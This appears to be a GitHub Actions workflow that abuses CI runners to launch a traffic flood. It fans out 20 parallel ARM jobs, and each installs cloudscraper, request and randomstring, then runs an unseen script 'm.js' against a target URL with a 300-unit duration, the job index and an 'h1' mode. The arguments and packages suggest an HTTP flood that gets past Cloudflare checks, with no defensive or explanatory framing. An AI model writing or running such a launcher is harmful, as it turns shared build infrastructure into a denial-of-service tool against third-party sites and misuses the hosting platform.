name: Linux ARM64 Parallel Jobs
on:
  workflow_dispatch:
  push:
    branches: [ main ]

jobs:
  linux-arm64:
    runs-on: ${{ matrix.runner }}
    strategy:
      matrix:
        runner: [ubuntu-24.04-arm, ubuntu-22.04-arm]
        node-index: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

    steps:
      - name: Checkout code
        uses: actions/checkout@v4
      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '20'
      - name: Install dependencies
        run: npm install cloudscraper request randomstring
      - name: Run Node script
        run: node m.js https://github.com/vrbrh921-glitch/Bdbs/edit/main/.github/workflows/main.yml 300 ${{ matrix.node-index }} h1
